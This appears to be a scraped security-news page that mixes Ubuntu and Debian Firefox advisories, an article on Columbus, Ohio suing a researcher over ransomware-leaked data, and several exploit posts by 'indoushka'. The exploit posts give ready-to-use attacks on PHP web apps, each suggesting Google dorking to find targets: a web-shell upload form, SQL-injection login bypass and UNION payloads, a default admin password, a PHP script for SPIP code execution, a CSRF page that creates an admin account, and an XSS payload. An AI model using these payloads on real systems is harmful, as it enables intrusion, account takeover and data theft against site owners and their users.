Ubuntu Security Notice 6992-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Nils Bars discovered that Firefox contained a type confusion vulnerability when performing certain property name lookups. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6992-1September 05, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-8382,CVE-2024-8383, CVE-2024-8386, CVE-2024-8387, CVE-2024-8389)Nils Bars discovered that Firefox contained a type confusion vulnerabilitywhen performing certain property name lookups. An attacker couldpotentially exploit this issue to cause a denial of service, or executearbitrary code. (CVE-2024-8381)It was discovered that Firefox did not properly manage memory duringgarbage collection. An attacker could potentially exploit this issue tocause a denial of service, or execute arbitrary code. (CVE-2024-8384)Seunghyun Lee discovered that Firefox contained a type confusionvulnerability when handling certain ArrayTypes. An attacker couldpotentially exploit this issue to cause a denial of service, or executearbitrary code. (CVE-2024-8385)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   firefox                         130.0+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changesReferences:   https://ubuntu.com/security/notices/USN-6992-1   CVE-2024-8381, CVE-2024-8382, CVE-2024-8383, CVE-2024-8384,   CVE-2024-8385, CVE-2024-8386, CVE-2024-8387, CVE-2024-8389Package Information:   https://launchpad.net/ubuntu/+source/firefox/130.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6992-1

Debian Linux Security Advisory 5765-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5765-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 04, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-8381 CVE-2024-8382 CVE-2024-8383 CVE-2024-8384Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode.For the stable distribution (bookworm), these problems have been fixed inversion 115.15.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbX9bEACgkQEMKTtsN8Tjbwzg/7BRH1FshkIoqMreCmhj9AYevh3VmSLDqcUOVU0a2LrLOqcJCsRIyhhrl5BXxGt0w9Q1KOIYBlwSsRU+EAlcwlh6+1FyKqrAcc8SDN+klK7NekODMHXj4gzge3adyaVYoYpHNhfYt+aVwZD+XTrI0d64V9HsO7Jsa9bwyI+xelgxuFfb8061L4q+ViQgzyCrl+vjaS6doRK5gZCVjPeuaFPKbppO5VIapF2/RIqDqZOCrziSONeqTaw7IRPITMnEHEl/+hPK9qQOmyw/suEES/Cl7aagj5znd8pQVvwpMMql/soAGX96G+y/2dC0s4cgaxwN6JAyRao7tFbCTjHpbxK+hy6pXcEBnrMPZ79plaZQ7L5uEMX6OxgEtRWGRA10Nti1RxRT48bgx8o8BnQ7K7lIHJn8afXb5pTf9rwezRyvy0UrCHAtta6Z2galVPrb5tbPBLt8MrS0cPd+RYj1M8wgrVnxCIa8N4qHLtw0adiyZa32e+lwtCbOhMQarAobD3zFGKBJsd0/lzKjeQHgIX3hRmZ57TOAgqRR6M91bbtxpDg+dGrxMUiqV/+fF7oB3WsR4KgXJCO+1YR7khOlWieTl+2Uf/w3PT0BBE4smJ9SAa+ZZuGZFyVVdmWRP2hy3OR5h7Hpe3po59/TzMlIcm6TdhYKUp0q/ANPKFS0cu9Ks==YiPV-----END PGP SIGNATURE-----

Debian Security Advisory 5765-1

Online Travel Agency System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Travel v1.0 Remote File Upload Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://github.com/oretnom23/php-travel-agency-system                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .<form action="http://127.0.0.1/tour/admin/operations/admin.php?id=2" method="POST" enctype="multipart/form-data">   <label for="file">Upload File:</label>  <input type="file" id="file" name="file"><br><br>  <input type="submit" name="Fcuk Up" value="Fcuk Up"></form>[+] Go to the line 1.[+] Set the target site link Save changes and apply . [+] infected file : /tour/admin/operations/admin.php. [+] save code as poc.html .[+] Path : http://127.0.0.1/tour/admin/upload/webadmin.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Online Travel Agency System 1.0 Shell Upload

Tourism Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Tourism Management System 1.0 Auth BY Pass Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : ' or 0=0 ##[+] http://localhost/tourism/admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tourism Management System 1.0 SQL Injection

The City of Columbus filed a lawsuit against a researcher for trying to inform the public about the nature data stolen by a ransomware group

The City of Columbus, Ohio is suing a security researcher for sharing stolen data.

All the complaint will accomplish, we imagine, is spotlight the ignorance of certain city officials in handling a common security matter.

What happened is that the City of Columbus was attacked by a ransomware group on July 18, 2024. Due to the timing, it was at first unclear whether the disruption in the public facing services was caused by the CrowdStrike incident or if it was in fact an attack. The attack was later claimed by the Rhysida ransomware group on their leak site, where the group posts information about recent victims that are unwilling to pay.

The City of Columbus said that the city’s Department of Technology quickly identified the threat and took action to significantly limit potential exposure. Due to the swift action no systems had been encrypted, but they were looking into the possibility that sensitive data might have been stolen in the attack.

> “The city is in the process of identifying individuals whose personal information was potentially exposed and will provide notice and additional guidance to all who are impacted in the coming weeks.”

Rhysida started an auction to buy the stolen data with a starting bid of about $1.7 million in bitcoin. When that didn’t render any results, Rhysida published (please note the word “published” here, it’s important) stolen data comprising 260,000 files (3.1 TB) which was almost half of what they claimed to have, on August 8, 2024.

On that same day, the mayor of Columbus stated on local media that the disclosed information was neither valuable nor usable.

> “The fact that the threat actor’s attempted data auction failed is a strong indication that the data lacks value to those who would seek to do harm or profit from it.”

This is where an external security researcher comes in. Security researcher David Leroy Ross, aka Connor Goodwolf, shared information with the media about the content of the stolen data. From what Goodwolf shared it became clear that the data contained unencrypted personal information of city employees and residents.

So, the City of Columbus decided to sue Goodwolf for alleged damages for criminal acts, invasion of privacy, negligence, and civil conversion.

The lawsuit claimed that downloading documents from a dark web site run by ransomware attackers amounted to him interacting with the ransomware group and that it required special expertise and tools.

When all he did was use a special browser to visit a website, download a file, and disclose the nature of the data to the local press. These actions, mind you, indistinguishable from the work of many security researchers committed to stopping cyberattacks.

Take, for instance, the means of access for Goodwolf.

If you are willing to consider the Tor Browser to be a special tool, I’ll grant you that one, although grudgingly. If you are a Firefox user, you may see a big resemblance with the Tor Browser, so the browser is not really that special. If visiting a website and downloading a file is a crime, we’re all guilty of said crime. If disclosing that a public official told an untruth (even if it was out of ignorance) is wrong then you probably shouldn’t want to live in a democratic country.

But unfortunately, a Franklin County judge issued the coveted temporary restraining order barring Goodwolf from accessing, downloading, and disseminating the City’s stolen data. The order also requires the defendant to preserve all data that was downloaded to date.

We want to make absolutely clear: Rhysida stole and published the data. And it was spokespeople from The City of Columbus that told everyone not to worry about other criminals using the data for further crimes, instead of warning the people that they should be wary of phishing attempts that could leverage the stolen data against them.

****Protecting yourself after a data breach****

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 City of Columbus tries to silence security researcher 

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

**Taskhub 2.8.8 Insecure Settings**

Posted Sep 3, 2024

Authored by indoushka

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2c385d7b29ff2d1f0cadb673bff0447f2a27c839cc502710002b3eab58740544

Download | Favorite | View

**Taskhub 2.8.8 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v2.8.8 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,625)
*   Arbitrary (17,028)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,868)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,420)
*   DoS (25,190)
*   Encryption (2,389)
*   Exploit (54,101)
*   File Inclusion (4,271)
*   File Upload (1,007)
*   Firewall (822)
*   Info Disclosure (2,911)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,252)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,205)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,652)
*   Remote (31,810)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,693)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,048)
*   Web (10,128)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,278)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,006)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,685)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,797)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,757)
*   Other

Taskhub 2.8.8 Insecure Settings

Webpay E-Commerce version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 SQL Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : catproduct.php?catpro=6[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs[+] Parameter: catpro (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: catpro=6' AND 5853=5853-- KEle    Type: UNION query    Title: Generic UNION query (NULL) - 15 columns    Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 SQL Injection

SPIP version 4.2.9 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.9 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://example/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.9 Code Execution

Online Traffic Offense version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Online Traffic Offense 1.0 CSRF Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to create a file and inject PHP code.[+] save payload as poc.html [+] line 6,Set your target.[+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http:\/\/127.0.0.1\/traffic_offense\/classes\/Users.php?f=save", true);  xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Traffic Offense 1.0 Cross Site Request Forgery

Penglead version 2.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : penglead v2.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /login.php/"onmouseover%3d'prompt(920974)'bad%3d"[+] https://www/127.0.0.1/demo/brokerbaba.buzz/login.php/"onmouseover%3d'prompt(920974)'bad%3d"Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Tag

#firefox